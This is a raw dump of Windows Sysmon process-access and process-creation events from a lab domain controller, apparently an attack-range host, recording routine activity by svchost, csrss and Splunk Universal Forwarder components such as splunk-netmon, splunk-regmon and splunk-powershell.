14:08:46.060{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019180Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:46.060{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019179Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:46.060{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019178Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:46.060{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019177Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:46.060{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-966E-6005-7C05-00000000A301}1420C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000019176Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:46.060{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-966E-6005-7C05-00000000A301}1420C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000019175Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:46.061{59A5CD1D-966E-6005-7C05-00000000A301}1420C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000019209Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:48.920{59A5CD1D-9670-6005-7F05-00000000A301}31245536C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019208Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:48.763{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9670-6005-7F05-00000000A301}3124C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019207Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:48.763{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019206Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:48.763{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019205Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:48.763{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019204Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:48.763{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019203Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:48.763{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9670-6005-7F05-00000000A301}3124C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000019202Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:48.763{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9670-6005-7F05-00000000A301}3124C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000019201Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:48.764{59A5CD1D-9670-6005-7F05-00000000A301}3124C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000019200Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:48.248{59A5CD1D-9670-6005-7E05-00000000A301}42882960C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019199Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:48.096{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9670-6005-7E05-00000000A301}4288C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019198Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:48.094{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019197Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:48.094{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019196Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:48.094{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019195Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:48.094{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019194Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:48.093{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9670-6005-7E05-00000000A301}4288C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000019193Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:48.093{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9670-6005-7E05-00000000A301}4288C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000019192Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:48.093{59A5CD1D-9670-6005-7E05-00000000A301}4288C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000019217Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:49.482{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9671-6005-8005-00000000A301}4896C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019216Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:49.482{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019215Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:49.482{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019214Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 